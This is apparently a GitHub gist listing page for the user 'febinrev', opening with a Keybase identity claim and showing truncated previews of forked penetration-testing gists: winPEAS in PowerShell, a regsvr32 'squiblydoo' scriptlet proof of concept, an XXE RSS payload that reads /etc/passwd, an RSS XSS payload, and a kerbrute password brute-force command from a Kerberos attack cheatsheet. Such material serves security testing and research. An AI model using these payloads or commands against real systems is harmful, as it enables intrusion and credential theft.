I hereby claim:
- I am febinrev on github.
- I am febinrev (https://keybase.io/febinrev) on keybase.
- I have a public key ASD-VY7tu8hWr9y9zCw2iaD20yNIvPUtN9-Ar7ytVfY-tQo
To claim this, I am signing this object:
febiNJ febinrev
febinrev
/ Invoke-winPEAS.ps1
Created
April 4, 2022 17:51
— forked from S3cur3Th1sSh1t/Invoke-winPEAS.ps1
winPEAS in powershell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-winPEAS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
febinrev
/ Backdoor-Minimalist.sct
Created
June 10, 2021 10:01
— forked from enigma0x3/Backdoor-Minimalist.sct
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
febinrev
/ xxe.rss
Created
February 19, 2021 06:47
— forked from sl4v/xxe.rss
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE title [ <!ELEMENT title ANY > | |
| <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> | |
| <channel> | |
| <title>The Blog</title> | |
| <link>http://example.com/</link> | |
| <description>A blog about things</description> | |
| <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> | |
| <item> |
febinrev
/ rss-xss.xml
Last active
February 20, 2021 08:35
— forked from fyoorer/rss-xss.xml
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="UTF-8"?> | |
| <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:cc="http://web.resource.org/cc/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:media="http://search.yahoo.com/mrss/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> | |
| <channel> | |
| <atom:link href="http://dataskeptic.libsyn.com/rss" rel="self" type="application/rss+xml"/> | |
| <title>Febin POC</title> | |
| <pubDate>Fri, 15 Jan 2016 15:00:00 +0000</pubDate> | |
| <lastBuildDate>Fri, 15 Jan 2016 15:08:58 +0000</lastBuildDate> | |
| <generator>Bla Bla</generator> | |
| <link>javascript:alert(1);//</link> | |
| <language>en</language> |
febinrev
/ kerberos_attacks_cheatsheet.md
Created
June 9, 2020 07:36
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module: